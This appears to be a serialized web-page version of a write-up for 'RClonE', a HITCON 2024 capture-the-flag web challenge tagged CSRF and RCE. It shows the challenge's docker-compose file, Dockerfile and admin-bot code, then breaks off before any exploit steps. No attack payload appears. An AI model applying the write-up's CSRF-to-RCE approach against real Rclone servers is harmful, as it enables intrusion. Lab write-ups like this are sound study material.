[{"data":1,"prerenderedAt":2935},["ShallowReactive",2],{"content-query-ifL1ZpGqRo":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":2929,"_id":2930,"_source":2931,"_file":2932,"_stem":2933,"_extension":2934},"/writeups/rclone","writeups",false,"","RClonE",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"RClonE was a web challenge from Hitcon qual 2024.","web,csrf,rce","rclone","https://res.cloudinary.com/dmju5zuhr/image/upload/v1721341554/writeups/hitcon_ctf.webp","2024-07-16",[16,17,18,19,21,23,24,26],{"og:image":13},{"og:title":8},{"og:description":10},{"og:type":20},"article",{"og:url":22},"https://owalid.com/rclone",{"description":10},{"title":25},"RClonE writeup",{"keywords":27},"web,csrf,rce,writeup,hitcon,ctf",{"type":29,"children":30,"toc":2922},"root",[31,38,45,50,55,60,65,507,513,518,537,542,830,835,1184,1552,1557,1562,1568,1582,1587,1591,1604,1609,1656,1661,1665,1670,1703,1711,1716,1721,1729,1733,1738,1742,1747,1752,1758,1772,1776,1788,1802,1806,1811,1816,1821,1826,1868,1873,1878,2079,2084,2313,2326,2535,2540,2544,2549,2553,2558,2564,2569,2652,2657,2691,2696,2897,2902,2907,2912,2916],{"type":32,"tag":33,"props":34,"children":35},"element","h1",{"id":12},[36],{"type":37,"value":8},"text",{"type":32,"tag":39,"props":40,"children":42},"h2",{"id":41},"introduction",[43],{"type":37,"value":44},"Introduction",{"type":32,"tag":46,"props":47,"children":48},"p",{},[49],{"type":37,"value":10},{"type":32,"tag":46,"props":51,"children":52},{},[53],{"type":37,"value":54},"We can see below the architecture of the challenge:",{"type":32,"tag":56,"props":57,"children":59},"custom-image",{"imgSrc":58},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1721244495/writeups/rclone/archi.webp",[],{"type":32,"tag":46,"props":61,"children":62},{},[63],{"type":37,"value":64},"To begin with, we have two services that are launched from a docker-compose, one which is a bot that accesses the internet and one which is an Rclone service.",{"type":32,"tag":66,"props":67,"children":69},"code-card",{"lang":68},"yaml",[70],{"type":32,"tag":71,"props":72,"children":75},"pre",{"code":73,"language":68,"meta":7,"className":74,"style":7},"services:\n rclone:\n image: rclone\n build: .\n environment:\n - SECRET=secret # randomized secret per instancer\n ports:\n - \"5572:5572\"\n networks:\n - chall\n bot:\n image: rclone-bot\n build: ./bot\n environment:\n - TITLE=Admin Bot for RClonE\n - PORT=8000\n - URL_CHECK_REGEX=^https?://.{1,256}$\n - SECRET=secret # randomized secret per instancer\n security_opt: \n - seccomp=chrome.json\n ports:\n - \"8000:8000\"\n networks:\n - default\n - chall\nnetworks:\n chall:\n internal: true\n","language-yaml shiki shiki-themes vitesse-dark",[76],{"type":32,"tag":77,"props":78,"children":79},"code",{"__ignoreMap":7},[80,98,111,131,150,163,183,196,220,233,246,259,276,293,305,318,331,344,360,379,392,404,425,437,450,462,475,488],{"type":32,"tag":81,"props":82,"children":85},"span",{"class":83,"line":84},"line",1,[86,92],{"type":32,"tag":81,"props":87,"children":89},{"style":88},"--shiki-default:#B8A965",[90],{"type":37,"value":91},"services",{"type":32,"tag":81,"props":93,"children":95},{"style":94},"--shiki-default:#666666",[96],{"type":37,"value":97},":\n",{"type":32,"tag":81,"props":99,"children":101},{"class":83,"line":100},2,[102,107],{"type":32,"tag":81,"props":103,"children":104},{"style":88},[105],{"type":37,"value":106}," rclone",{"type":32,"tag":81,"props":108,"children":109},{"style":94},[110],{"type":37,"value":97},{"type":32,"tag":81,"props":112,"children":114},{"class":83,"line":113},3,[115,120,125],{"type":32,"tag":81,"props":116,"children":117},{"style":88},[118],{"type":37,"value":119}," image",{"type":32,"tag":81,"props":121,"children":122},{"style":94},[123],{"type":37,"value":124},":",{"type":32,"tag":81,"props":126,"children":128},{"style":127},"--shiki-default:#C98A7D",[129],{"type":37,"value":130}," rclone\n",{"type":32,"tag":81,"props":132,"children":134},{"class":83,"line":133},4,[135,140,144],{"type":32,"tag":81,"props":136,"children":137},{"style":88},[138],{"type":37,"value":139}," build",{"type":32,"tag":81,"props":141,"children":142},{"style":94},[143],{"type":37,"value":124},{"type":32,"tag":81,"props":145,"children":147},{"style":146},"--shiki-default:#4C9A91",[148],{"type":37,"value":149}," .\n",{"type":32,"tag":81,"props":151,"children":153},{"class":83,"line":152},5,[154,159],{"type":32,"tag":81,"props":155,"children":156},{"style":88},[157],{"type":37,"value":158}," environment",{"type":32,"tag":81,"props":160,"children":161},{"style":94},[162],{"type":37,"value":97},{"type":32,"tag":81,"props":164,"children":166},{"class":83,"line":165},6,[167,172,177],{"type":32,"tag":81,"props":168,"children":169},{"style":94},[170],{"type":37,"value":171}," -",{"type":32,"tag":81,"props":173,"children":174},{"style":127},[175],{"type":37,"value":176}," SECRET=secret",{"type":32,"tag":81,"props":178,"children":180},{"style":179},"--shiki-default:#758575DD",[181],{"type":37,"value":182}," # randomized secret per instancer\n",{"type":32,"tag":81,"props":184,"children":186},{"class":83,"line":185},7,[187,192],{"type":32,"tag":81,"props":188,"children":189},{"style":88},[190],{"type":37,"value":191}," ports",{"type":32,"tag":81,"props":193,"children":194},{"style":94},[195],{"type":37,"value":97},{"type":32,"tag":81,"props":197,"children":199},{"class":83,"line":198},8,[200,204,210,215],{"type":32,"tag":81,"props":201,"children":202},{"style":94},[203],{"type":37,"value":171},{"type":32,"tag":81,"props":205,"children":207},{"style":206},"--shiki-default:#C98A7D77",[208],{"type":37,"value":209}," \"",{"type":32,"tag":81,"props":211,"children":212},{"style":127},[213],{"type":37,"value":214},"5572:5572",{"type":32,"tag":81,"props":216,"children":217},{"style":206},[218],{"type":37,"value":219},"\"\n",{"type":32,"tag":81,"props":221,"children":223},{"class":83,"line":222},9,[224,229],{"type":32,"tag":81,"props":225,"children":226},{"style":88},[227],{"type":37,"value":228}," networks",{"type":32,"tag":81,"props":230,"children":231},{"style":94},[232],{"type":37,"value":97},{"type":32,"tag":81,"props":234,"children":236},{"class":83,"line":235},10,[237,241],{"type":32,"tag":81,"props":238,"children":239},{"style":94},[240],{"type":37,"value":171},{"type":32,"tag":81,"props":242,"children":243},{"style":127},[244],{"type":37,"value":245}," chall\n",{"type":32,"tag":81,"props":247,"children":249},{"class":83,"line":248},11,[250,255],{"type":32,"tag":81,"props":251,"children":252},{"style":88},[253],{"type":37,"value":254}," bot",{"type":32,"tag":81,"props":256,"children":257},{"style":94},[258],{"type":37,"value":97},{"type":32,"tag":81,"props":260,"children":262},{"class":83,"line":261},12,[263,267,271],{"type":32,"tag":81,"props":264,"children":265},{"style":88},[266],{"type":37,"value":119},{"type":32,"tag":81,"props":268,"children":269},{"style":94},[270],{"type":37,"value":124},{"type":32,"tag":81,"props":272,"children":273},{"style":127},[274],{"type":37,"value":275}," rclone-bot\n",{"type":32,"tag":81,"props":277,"children":279},{"class":83,"line":278},13,[280,284,288],{"type":32,"tag":81,"props":281,"children":282},{"style":88},[283],{"type":37,"value":139},{"type":32,"tag":81,"props":285,"children":286},{"style":94},[287],{"type":37,"value":124},{"type":32,"tag":81,"props":289,"children":290},{"style":127},[291],{"type":37,"value":292}," ./bot\n",{"type":32,"tag":81,"props":294,"children":296},{"class":83,"line":295},14,[297,301],{"type":32,"tag":81,"props":298,"children":299},{"style":88},[300],{"type":37,"value":158},{"type":32,"tag":81,"props":302,"children":303},{"style":94},[304],{"type":37,"value":97},{"type":32,"tag":81,"props":306,"children":308},{"class":83,"line":307},15,[309,313],{"type":32,"tag":81,"props":310,"children":311},{"style":94},[312],{"type":37,"value":171},{"type":32,"tag":81,"props":314,"children":315},{"style":127},[316],{"type":37,"value":317}," TITLE=Admin Bot for RClonE\n",{"type":32,"tag":81,"props":319,"children":321},{"class":83,"line":320},16,[322,326],{"type":32,"tag":81,"props":323,"children":324},{"style":94},[325],{"type":37,"value":171},{"type":32,"tag":81,"props":327,"children":328},{"style":127},[329],{"type":37,"value":330}," PORT=8000\n",{"type":32,"tag":81,"props":332,"children":334},{"class":83,"line":333},17,[335,339],{"type":32,"tag":81,"props":336,"children":337},{"style":94},[338],{"type":37,"value":171},{"type":32,"tag":81,"props":340,"children":341},{"style":127},[342],{"type":37,"value":343}," URL_CHECK_REGEX=^https?://.{1,256}$\n",{"type":32,"tag":81,"props":345,"children":347},{"class":83,"line":346},18,[348,352,356],{"type":32,"tag":81,"props":349,"children":350},{"style":94},[351],{"type":37,"value":171},{"type":32,"tag":81,"props":353,"children":354},{"style":127},[355],{"type":37,"value":176},{"type":32,"tag":81,"props":357,"children":358},{"style":179},[359],{"type":37,"value":182},{"type":32,"tag":81,"props":361,"children":363},{"class":83,"line":362},19,[364,369,373],{"type":32,"tag":81,"props":365,"children":366},{"style":88},[367],{"type":37,"value":368}," security_opt",{"type":32,"tag":81,"props":370,"children":371},{"style":94},[372],{"type":37,"value":124},{"type":32,"tag":81,"props":374,"children":376},{"style":375},"--shiki-default:#DBD7CAEE",[377],{"type":37,"value":378}," \n",{"type":32,"tag":81,"props":380,"children":382},{"class":83,"line":381},20,[383,387],{"type":32,"tag":81,"props":384,"children":385},{"style":94},[386],{"type":37,"value":171},{"type":32,"tag":81,"props":388,"children":389},{"style":127},[390],{"type":37,"value":391}," seccomp=chrome.json\n",{"type":32,"tag":81,"props":393,"children":395},{"class":83,"line":394},21,[396,400],{"type":32,"tag":81,"props":397,"children":398},{"style":88},[399],{"type":37,"value":191},{"type":32,"tag":81,"props":401,"children":402},{"style":94},[403],{"type":37,"value":97},{"type":32,"tag":81,"props":405,"children":407},{"class":83,"line":406},22,[408,412,416,421],{"type":32,"tag":81,"props":409,"children":410},{"style":94},[411],{"type":37,"value":171},{"type":32,"tag":81,"props":413,"children":414},{"style":206},[415],{"type":37,"value":209},{"type":32,"tag":81,"props":417,"children":418},{"style":127},[419],{"type":37,"value":420},"8000:8000",{"type":32,"tag":81,"props":422,"children":423},{"style":206},[424],{"type":37,"value":219},{"type":32,"tag":81,"props":426,"children":428},{"class":83,"line":427},23,[429,433],{"type":32,"tag":81,"props":430,"children":431},{"style":88},[432],{"type":37,"value":228},{"type":32,"tag":81,"props":434,"children":435},{"style":94},[436],{"type":37,"value":97},{"type":32,"tag":81,"props":438,"children":440},{"class":83,"line":439},24,[441,445],{"type":32,"tag":81,"props":442,"children":443},{"style":94},[444],{"type":37,"value":171},{"type":32,"tag":81,"props":446,"children":447},{"style":127},[448],{"type":37,"value":449}," default\n",{"type":32,"tag":81,"props":451,"children":453},{"class":83,"line":452},25,[454,458],{"type":32,"tag":81,"props":455,"children":456},{"style":94},[457],{"type":37,"value":171},{"type":32,"tag":81,"props":459,"children":460},{"style":127},[461],{"type":37,"value":245},{"type":32,"tag":81,"props":463,"children":465},{"class":83,"line":464},26,[466,471],{"type":32,"tag":81,"props":467,"children":468},{"style":88},[469],{"type":37,"value":470},"networks",{"type":32,"tag":81,"props":472,"children":473},{"style":94},[474],{"type":37,"value":97},{"type":32,"tag":81,"props":476,"children":478},{"class":83,"line":477},27,[479,484],{"type":32,"tag":81,"props":480,"children":481},{"style":88},[482],{"type":37,"value":483}," chall",{"type":32,"tag":81,"props":485,"children":486},{"style":94},[487],{"type":37,"value":97},{"type":32,"tag":81,"props":489,"children":491},{"class":83,"line":490},28,[492,497,501],{"type":32,"tag":81,"props":493,"children":494},{"style":88},[495],{"type":37,"value":496}," internal",{"type":32,"tag":81,"props":498,"children":499},{"style":94},[500],{"type":37,"value":124},{"type":32,"tag":81,"props":502,"children":504},{"style":503},"--shiki-default:#4D9375",[505],{"type":37,"value":506}," true\n",{"type":32,"tag":39,"props":508,"children":510},{"id":509},"recon",[511],{"type":37,"value":512},"Recon",{"type":32,"tag":46,"props":514,"children":515},{},[516],{"type":37,"value":517},"Before we start, we need to define what Rclone is.",{"type":32,"tag":519,"props":520,"children":521},"blockquote",{},[522],{"type":32,"tag":46,"props":523,"children":524},{},[525,527],{"type":37,"value":526},"Rclone is an open source, multi threaded, command line computer program to manage or migrate content on cloud and other high latency storage. Its capabilities include sync, transfer, crypt, cache, union, compress and mount. The rclone website lists supported backends including S3 and Google Drive. ",{"type":32,"tag":528,"props":529,"children":534},"a",{"href":530,"rel":531,":target":533},"https://en.wikipedia.org/wiki/Rclone",[532],"nofollow","_blank",[535],{"type":37,"value":536},"Wikis",{"type":32,"tag":46,"props":538,"children":539},{},[540],{"type":37,"value":541},"Now that Rclone is set up, we can talk about the services launched by the challenge in detail. In the dockerfile of the Rclone service, you can see that it is launched with the web interface.",{"type":32,"tag":66,"props":543,"children":545},{"lang":544},"docker",[546],{"type":32,"tag":71,"props":547,"children":550},{"code":548,"language":544,"meta":7,"className":549,"style":7},"FROM debian:bookworm-slim\n\nRUN apt-get update && \\\n apt-get install -y tini ca-certificates curl unzip && \\\n apt-get clean && \\\n rm -rf /var/lib/apt/lists/*\nWORKDIR /workdir\n\nARG RCLONE_VERSION=v1.67.0\nARG RCLONE_NAME=rclone-$RCLONE_VERSION-linux-amd64\nARG RCLONE_HASH=07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722\n\nRUN curl https://downloads.rclone.org/$RCLONE_VERSION/$RCLONE_NAME.zip -o rclone.zip && \\\n echo $RCLONE_HASH rclone.zip | sha256sum -c && \\\n unzip rclone.zip && \\\n mv $RCLONE_NAME/rclone /usr/bin\n\nCOPY ./readflag /readflag\nRUN chmod 111 /readflag\n\nRUN useradd -ms /bin/bash ctf\nUSER ctf\n\nENTRYPOINT [\"tini\", \"--\"]\nCMD rclone rcd --rc-addr 0.0.0.0:5572 --rc-web-gui --rc-user $SECRET --rc-pass $SECRET --rc-web-gui-no-open-browser\n","language-docker shiki shiki-themes vitesse-dark",[551],{"type":32,"tag":77,"props":552,"children":553},{"__ignoreMap":7},[554,567,576,589,597,605,613,626,633,646,658,670,677,689,697,705,713,720,733,745,752,764,777,784,817],{"type":32,"tag":81,"props":555,"children":556},{"class":83,"line":84},[557,562],{"type":32,"tag":81,"props":558,"children":559},{"style":503},[560],{"type":37,"value":561},"FROM",{"type":32,"tag":81,"props":563,"children":564},{"style":375},[565],{"type":37,"value":566}," debian:bookworm-slim\n",{"type":32,"tag":81,"props":568,"children":569},{"class":83,"line":100},[570],{"type":32,"tag":81,"props":571,"children":573},{"emptyLinePlaceholder":572},true,[574],{"type":37,"value":575},"\n",{"type":32,"tag":81,"props":577,"children":578},{"class":83,"line":113},[579,584],{"type":32,"tag":81,"props":580,"children":581},{"style":503},[582],{"type":37,"value":583},"RUN",{"type":32,"tag":81,"props":585,"children":586},{"style":375},[587],{"type":37,"value":588}," apt-get update && \\\n",{"type":32,"tag":81,"props":590,"children":591},{"class":83,"line":133},[592],{"type":32,"tag":81,"props":593,"children":594},{"style":375},[595],{"type":37,"value":596}," apt-get install -y tini ca-certificates curl unzip && \\\n",{"type":32,"tag":81,"props":598,"children":599},{"class":83,"line":152},[600],{"type":32,"tag":81,"props":601,"children":602},{"style":375},[603],{"type":37,"value":604}," apt-get clean && \\\n",{"type":32,"tag":81,"props":606,"children":607},{"class":83,"line":165},[608],{"type":32,"tag":81,"props":609,"children":610},{"style":375},[611],{"type":37,"value":612}," rm -rf /var/lib/apt/lists/*\n",{"type":32,"tag":81,"props":614,"children":615},{"class":83,"line":185},[616,621],{"type":32,"tag":81,"props":617,"children":618},{"style":503},[619],{"type":37,"value":620},"WORKDIR",{"type":32,"tag":81,"props":622,"children":623},{"style":375},[624],{"type":37,"value":625}," /workdir\n",{"type":32,"tag":81,"props":627,"children":628},{"class":83,"line":198},[629],{"type":32,"tag":81,"props":630,"children":631},{"emptyLinePlaceholder":572},[632],{"type":37,"value":575},{"type":32,"tag":81,"props":634,"children":635},{"class":83,"line":222},[636,641],{"type":32,"tag":81,"props":637,"children":638},{"style":503},[639],{"type":37,"value":640},"ARG",{"type":32,"tag":81,"props":642,"children":643},{"style":375},[644],{"type":37,"value":645}," RCLONE_VERSION=v1.67.0\n",{"type":32,"tag":81,"props":647,"children":648},{"class":83,"line":235},[649,653],{"type":32,"tag":81,"props":650,"children":651},{"style":503},[652],{"type":37,"value":640},{"type":32,"tag":81,"props":654,"children":655},{"style":375},[656],{"type":37,"value":657}," RCLONE_NAME=rclone-$RCLONE_VERSION-linux-amd64\n",{"type":32,"tag":81,"props":659,"children":660},{"class":83,"line":248},[661,665],{"type":32,"tag":81,"props":662,"children":663},{"style":503},[664],{"type":37,"value":640},{"type":32,"tag":81,"props":666,"children":667},{"style":375},[668],{"type":37,"value":669}," RCLONE_HASH=07c23d21a94d70113d949253478e13261c54d14d72023bb14d96a8da5f3e7722\n",{"type":32,"tag":81,"props":671,"children":672},{"class":83,"line":261},[673],{"type":32,"tag":81,"props":674,"children":675},{"emptyLinePlaceholder":572},[676],{"type":37,"value":575},{"type":32,"tag":81,"props":678,"children":679},{"class":83,"line":278},[680,684],{"type":32,"tag":81,"props":681,"children":682},{"style":503},[683],{"type":37,"value":583},{"type":32,"tag":81,"props":685,"children":686},{"style":375},[687],{"type":37,"value":688}," curl https://downloads.rclone.org/$RCLONE_VERSION/$RCLONE_NAME.zip -o rclone.zip && \\\n",{"type":32,"tag":81,"props":690,"children":691},{"class":83,"line":295},[692],{"type":32,"tag":81,"props":693,"children":694},{"style":375},[695],{"type":37,"value":696}," echo $RCLONE_HASH rclone.zip | sha256sum -c && \\\n",{"type":32,"tag":81,"props":698,"children":699},{"class":83,"line":307},[700],{"type":32,"tag":81,"props":701,"children":702},{"style":375},[703],{"type":37,"value":704}," unzip rclone.zip && \\\n",{"type":32,"tag":81,"props":706,"children":707},{"class":83,"line":320},[708],{"type":32,"tag":81,"props":709,"children":710},{"style":375},[711],{"type":37,"value":712}," mv $RCLONE_NAME/rclone /usr/bin\n",{"type":32,"tag":81,"props":714,"children":715},{"class":83,"line":333},[716],{"type":32,"tag":81,"props":717,"children":718},{"emptyLinePlaceholder":572},[719],{"type":37,"value":575},{"type":32,"tag":81,"props":721,"children":722},{"class":83,"line":346},[723,728],{"type":32,"tag":81,"props":724,"children":725},{"style":503},[726],{"type":37,"value":727},"COPY",{"type":32,"tag":81,"props":729,"children":730},{"style":375},[731],{"type":37,"value":732}," ./readflag /readflag\n",{"type":32,"tag":81,"props":734,"children":735},{"class":83,"line":362},[736,740],{"type":32,"tag":81,"props":737,"children":738},{"style":503},[739],{"type":37,"value":583},{"type":32,"tag":81,"props":741,"children":742},{"style":375},[743],{"type":37,"value":744}," chmod 111 /readflag\n",{"type":32,"tag":81,"props":746,"children":747},{"class":83,"line":381},[748],{"type":32,"tag":81,"props":749,"children":750},{"emptyLinePlaceholder":572},[751],{"type":37,"value":575},{"type":32,"tag":81,"props":753,"children":754},{"class":83,"line":394},[755,759],{"type":32,"tag":81,"props":756,"children":757},{"style":503},[758],{"type":37,"value":583},{"type":32,"tag":81,"props":760,"children":761},{"style":375},[762],{"type":37,"value":763}," useradd -ms /bin/bash ctf\n",{"type":32,"tag":81,"props":765,"children":766},{"class":83,"line":406},[767,772],{"type":32,"tag":81,"props":768,"children":769},{"style":503},[770],{"type":37,"value":771},"USER",{"type":32,"tag":81,"props":773,"children":774},{"style":375},[775],{"type":37,"value":776}," ctf\n",{"type":32,"tag":81,"props":778,"children":779},{"class":83,"line":427},[780],{"type":32,"tag":81,"props":781,"children":782},{"emptyLinePlaceholder":572},[783],{"type":37,"value":575},{"type":32,"tag":81,"props":785,"children":786},{"class":83,"line":439},[787,792,797,802,807,812],{"type":32,"tag":81,"props":788,"children":789},{"style":503},[790],{"type":37,"value":791},"ENTRYPOINT",{"type":32,"tag":81,"props":793,"children":794},{"style":375},[795],{"type":37,"value":796}," [",{"type":32,"tag":81,"props":798,"children":799},{"style":127},[800],{"type":37,"value":801},"\"tini\"",{"type":32,"tag":81,"props":803,"children":804},{"style":375},[805],{"type":37,"value":806},", ",{"type":32,"tag":81,"props":808,"children":809},{"style":127},[810],{"type":37,"value":811},"\"--\"",{"type":32,"tag":81,"props":813,"children":814},{"style":375},[815],{"type":37,"value":816},"]\n",{"type":32,"tag":81,"props":818,"children":819},{"class":83,"line":452},[820,825],{"type":32,"tag":81,"props":821,"children":822},{"style":503},[823],{"type":37,"value":824},"CMD",{"type":32,"tag":81,"props":826,"children":827},{"style":375},[828],{"type":37,"value":829}," rclone rcd --rc-addr 0.0.0.0:5572 --rc-web-gui --rc-user $SECRET --rc-pass $SECRET --rc-web-gui-no-open-browser\n",{"type":32,"tag":46,"props":831,"children":832},{},[833],{"type":37,"value":834},"The bot, on the other hand, does nothing but authenticate itself on the Rclone service and visit the page that is passed in the body of the post request.",{"type":32,"tag":66,"props":836,"children":838},{"lang":837},"js",[839],{"type":32,"tag":71,"props":840,"children":843},{"code":841,"language":837,"meta":7,"className":842,"style":7},"[...]\napp.post('/submit', async (req, res) => {\n const { url } = req.body\n[...]\n try {\n console.log(`[+] Sending ${url} to bot`)\n await visit(url)\n res.send('OK')\n } catch (e) {\n [...]\n }\n})\n[...]\n","language-js shiki shiki-themes vitesse-dark",[844],{"type":32,"tag":77,"props":845,"children":846},{"__ignoreMap":7},[847,855,939,981,988,1000,1060,1085,1123,1153,1161,1169,1177],{"type":32,"tag":81,"props":848,"children":849},{"class":83,"line":84},[850],{"type":32,"tag":81,"props":851,"children":852},{"style":94},[853],{"type":37,"value":854},"[...]\n",{"type":32,"tag":81,"props":856,"children":857},{"class":83,"line":100},[858,864,869,875,880,885,890,894,899,905,910,915,919,924,929,934],{"type":32,"tag":81,"props":859,"children":861},{"style":860},"--shiki-default:#BD976A",[862],{"type":37,"value":863},"app",{"type":32,"tag":81,"props":865,"children":866},{"style":94},[867],{"type":37,"value":868},".",{"type":32,"tag":81,"props":870,"children":872},{"style":871},"--shiki-default:#80A665",[873],{"type":37,"value":874},"post",{"type":32,"tag":81,"props":876,"children":877},{"style":94},[878],{"type":37,"value":879},"(",{"type":32,"tag":81,"props":881,"children":882},{"style":206},[883],{"type":37,"value":884},"'",{"type":32,"tag":81,"props":886,"children":887},{"style":127},[888],{"type":37,"value":889},"/submit",{"type":32,"tag":81,"props":891,"children":892},{"style":206},[893],{"type":37,"value":884},{"type":32,"tag":81,"props":895,"children":896},{"style":94},[897],{"type":37,"value":898},",",{"type":32,"tag":81,"props":900,"children":902},{"style":901},"--shiki-default:#CB7676",[903],{"type":37,"value":904}," async",{"type":32,"tag":81,"props":906,"children":907},{"style":94},[908],{"type":37,"value":909}," (",{"type":32,"tag":81,"props":911,"children":912},{"style":860},[913],{"type":37,"value":914},"req",{"type":32,"tag":81,"props":916,"children":917},{"style":94},[918],{"type":37,"value":898},{"type":32,"tag":81,"props":920,"children":921},{"style":860},[922],{"type":37,"value":923}," res",{"type":32,"tag":81,"props":925,"children":926},{"style":94},[927],{"type":37,"value":928},")",{"type":32,"tag":81,"props":930,"children":931},{"style":94},[932],{"type":37,"value":933}," =>",{"type":32,"tag":81,"props":935,"children":936},{"style":94},[937],{"type":37,"value":938}," {\n",{"type":32,"tag":81,"props":940,"children":941},{"class":83,"line":113},[942,947,952,957,962,967,972,976],{"type":32,"tag":81,"props":943,"children":944},{"style":901},[945],{"type":37,"value":946}," const",{"type":32,"tag":81,"props":948,"children":949},{"style":94},[950],{"type":37,"value":951}," {",{"type":32,"tag":81,"props":953,"children":954},{"style":860},[955],{"type":37,"value":956}," url",{"type":32,"tag":81,"props":958,"children":959},{"style":94},[960],{"type":37,"value":961}," }",{"type":32,"tag":81,"props":963,"children":964},{"style":94},[965],{"type":37,"value":966}," =",{"type":32,"tag":81,"props":968,"children":969},{"style":860},[970],{"type":37,"value":971}," req",{"type":32,"tag":81,"props":973,"children":974},{"style":94},[975],{"type":37,"value":868},{"type":32,"tag":81,"props":977,"children":978},{"style":860},[979],{"type":37,"value":980},"body\n",{"type":32,"tag":81,"props":982,"children":983},{"class":83,"line":133},[984],{"type":32,"tag":81,"props":985,"children":986},{"style":94},[987],{"type":37,"value":854},{"type":32,"tag":81,"props":989,"children":990},{"class":83,"line":152},[991,996],{"type":32,"tag":81,"props":992,"children":993},{"style":503},[994],{"type":37,"value":995}," try",{"type":32,"tag":81,"props":997,"children":998},{"style":94},[999],{"type":37,"value":938},{"type":32,"tag":81,"props":1001,"children":1002},{"class":83,"line":165},[1003,1008,1012,1017,1021,1026,1031,1036,1041,1046,1051,1055],{"type":32,"tag":81,"props":1004,"children":1005},{"style":860},[1006],{"type":37,"value":1007}," console",{"type":32,"tag":81,"props":1009,"children":1010},{"style":94},[1011],{"type":37,"value":868},{"type":32,"tag":81,"props":1013,"children":1014},{"style":871},[1015],{"type":37,"value":1016},"log",{"type":32,"tag":81,"props":1018,"children":1019},{"style":94},[1020],{"type":37,"value":879},{"type":32,"tag":81,"props":1022,"children":1023},{"style":206},[1024],{"type":37,"value":1025},"`",{"type":32,"tag":81,"props":1027,"children":1028},{"style":127},[1029],{"type":37,"value":1030},"[+] Sending ",{"type":32,"tag":81,"props":1032,"children":1033},{"style":503},[1034],{"type":37,"value":1035},"${",{"type":32,"tag":81,"props":1037,"children":1038},{"style":127},[1039],{"type":37,"value":1040},"url",{"type":32,"tag":81,"props":1042,"children":1043},{"style":503},[1044],{"type":37,"value":1045},"}",{"type":32,"tag":81,"props":1047,"children":1048},{"style":127},[1049],{"type":37,"value":1050}," to bot",{"type":32,"tag":81,"props":1052,"children":1053},{"style":206},[1054],{"type":37,"value":1025},{"type":32,"tag":81,"props":1056,"children":1057},{"style":94},[1058],{"type":37,"value":1059},")\n",{"type":32,"tag":81,"props":1061,"children":1062},{"class":83,"line":185},[1063,1068,1073,1077,1081],{"type":32,"tag":81,"props":1064,"children":1065},{"style":503},[1066],{"type":37,"value":1067}," await",{"type":32,"tag":81,"props":1069,"children":1070},{"style":871},[1071],{"type":37,"value":1072}," visit",{"type":32,"tag":81,"props":1074,"children":1075},{"style":94},[1076],{"type":37,"value":879},{"type":32,"tag":81,"props":1078,"children":1079},{"style":860},[1080],{"type":37,"value":1040},{"type":32,"tag":81,"props":1082,"children":1083},{"style":94},[1084],{"type":37,"value":1059},{"type":32,"tag":81,"props":1086,"children":1087},{"class":83,"line":198},[1088,1093,1097,1102,1106,1110,1115,1119],{"type":32,"tag":81,"props":1089,"children":1090},{"style":860},[1091],{"type":37,"value":1092}," res",{"type":32,"tag":81,"props":1094,"children":1095},{"style":94},[1096],{"type":37,"value":868},{"type":32,"tag":81,"props":1098,"children":1099},{"style":871},[1100],{"type":37,"value":1101},"send",{"type":32,"tag":81,"props":1103,"children":1104},{"style":94},[1105],{"type":37,"value":879},{"type":32,"tag":81,"props":1107,"children":1108},{"style":206},[1109],{"type":37,"value":884},{"type":32,"tag":81,"props":1111,"children":1112},{"style":127},[1113],{"type":37,"value":1114},"OK",{"type":32,"tag":81,"props":1116,"children":1117},{"style":206},[1118],{"type":37,"value":884},{"type":32,"tag":81,"props":1120,"children":1121},{"style":94},[1122],{"type":37,"value":1059},{"type":32,"tag":81,"props":1124,"children":1125},{"class":83,"line":222},[1126,1131,1136,1140,1145,1149],{"type":32,"tag":81,"props":1127,"children":1128},{"style":94},[1129],{"type":37,"value":1130}," }",{"type":32,"tag":81,"props":1132,"children":1133},{"style":503},[1134],{"type":37,"value":1135}," catch",{"type":32,"tag":81,"props":1137,"children":1138},{"style":94},[1139],{"type":37,"value":909},{"type":32,"tag":81,"props":1141,"children":1142},{"style":860},[1143],{"type":37,"value":1144},"e",{"type":32,"tag":81,"props":1146,"children":1147},{"style":94},[1148],{"type":37,"value":928},{"type":32,"tag":81,"props":1150,"children":1151},{"style":94},[1152],{"type":37,"value":938},{"type":32,"tag":81,"props":1154,"children":1155},{"class":83,"line":235},[1156],{"type":32,"tag":81,"props":1157,"children":1158},{"style":94},[1159],{"type":37,"value":1160}," [...]\n",{"type":32,"tag":81,"props":1162,"children":1163},{"class":83,"line":248},[1164],{"type":32,"tag":81,"props":1165,"children":1166},{"style":94},[1167],{"type":37,"value":1168}," }\n",{"type":32,"tag":81,"props":1170,"children":1171},{"class":83,"line":261},[1172],{"type":32,"tag":81,"props":1173,"children":1174},{"style":94},[1175],{"type":37,"value":1176},"})\n",{"type":32,"tag":81,"props":1178,"children":1179},{"class":83,"line":278},[1180],{"type":32,"tag":81,"props":1181,"children":1182},{"style":94},[1183],{"type":37,"value":854},{"type":32,"tag":66,"props":1185,"children":1186},{"lang":837},[1187],{"type":32,"tag":71,"props":1188,"children":1190},{"code":1189,"language":837,"meta":7,"className":842,"style":7},"const visit = async url => {\n[...]\n context = await browser.createBrowserContext()\n\n const page1 = await context.newPage()\n await page1.goto(LOGIN_URL)\n await page1.close()\n\n const page2 = await context.newPage()\n await Promise.race([\n page2.goto(url, {\n waitUntil: 'networkidle0'\n }),\n sleep(5000)\n ])\n[...]\n}\n",[1191],{"type":32,"tag":77,"props":1192,"children":1193},{"__ignoreMap":7},[1194,1226,1233,1269,1276,1315,1348,1372,1379,1415,1441,1473,1500,1508,1529,1537,1544],{"type":32,"tag":81,"props":1195,"children":1196},{"class":83,"line":84},[1197,1202,1206,1210,1214,1218,1222],{"type":32,"tag":81,"props":1198,"children":1199},{"style":901},[1200],{"type":37,"value":1201},"const",{"type":32,"tag":81,"props":1203,"children":1204},{"style":871},[1205],{"type":37,"value":1072},{"type":32,"tag":81,"props":1207,"children":1208},{"style":94},[1209],{"type":37,"value":966},{"type":32,"tag":81,"props":1211,"children":1212},{"style":901},[1213],{"type":37,"value":904},{"type":32,"tag":81,"props":1215,"children":1216},{"style":860},[1217],{"type":37,"value":956},{"type":32,"tag":81,"props":1219,"children":1220},{"style":94},[1221],{"type":37,"value":933},{"type":32,"tag":81,"props":1223,"children":1224},{"style":94},[1225],{"type":37,"value":938},{"type":32,"tag":81,"props":1227,"children":1228},{"class":83,"line":10